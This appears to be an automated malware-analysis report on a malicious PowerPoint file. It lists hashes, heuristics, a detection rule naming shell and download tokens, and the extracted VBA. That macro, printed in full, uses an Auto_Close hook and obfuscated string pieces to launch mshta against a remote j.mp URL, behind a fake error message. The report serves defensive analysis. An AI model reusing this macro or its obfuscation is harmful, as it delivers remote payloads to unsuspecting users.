Office (OLE) / .PPT malware analysis — malicious · 62ed8a07014021d3

MALICIOUS

Office (OLE) / .PPT

92.5 KB Created: 2006-08-16 00:00:00 Authoring application: Microsoft Office PowerPoint First seen: 2026-05-13

MD5: ac3faaeac653ebeb603650459dfc965b SHA-1: 2d57f3647a629839f48613b819d92447ba052d70 SHA-256: 62ed8a07014021d33ac22731885a5530fef8ec2d871df62a2ab79a9b860f7085

128 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The critical heuristic 'OLE_VBA_SHELL' and the high heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate the presence of a potentially malicious Shell call within the VBA macros. The Auto_Close macro attempts to construct and execute a command string, which includes launching 'WINWORD' and concatenating a URL. This suggests the macro is designed to download and execute a second-stage payload.

Heuristics 4

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

MsgBox ("Office 365 Not installed!"): Shell ("WINWORD"): Shell (WINWORD + MsgBoxOláMundo¨¨¨¨M_S)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub Auto_Close()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 540 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	540 bytes
SHA-256: `6d8d75469f94b5ad050f1c137899ab6f19b63a899f2ad7487188eb10dce8afa2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Auto_Close() ¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨ = "jasdoaksdosasdkdkodk" ¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ = "tp://1230912489%1230192309@j.mp/" ¨¨¨¨PDf_1¨¨ = "hta"" ht" ¨¨¨¨PDf¨¨¨¨¨¨¨¨ = """ms" MsgBoxOláMundo¨¨¨¨M_S = ¨¨¨¨PDf¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_1¨¨ + ¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨ MsgBox ("Office 365 Not installed!"): Shell ("WINWORD"): Shell (WINWORD + MsgBoxOláMundo¨¨¨¨M_S) End Sub

SHA-256: 6d8d75469f94b5ad050f1c137899ab6f19b63a899f2ad7487188eb10dce8afa2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub Auto_Close()



¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨ = "jasdoaksdosasdkdkodk"

¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ = "tp://1230912489%1230192309@j.mp/"

¨¨¨¨PDf_1¨¨ = "hta"" ht"


¨¨¨¨PDf¨¨¨¨¨¨¨¨ = """ms"

MsgBoxOláMundo¨¨¨¨M_S = ¨¨¨¨PDf¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_1¨¨ + ¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨
MsgBox ("Office 365 Not installed!"): Shell ("WINWORD"): Shell (WINWORD + MsgBoxOláMundo¨¨¨¨M_S)




End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.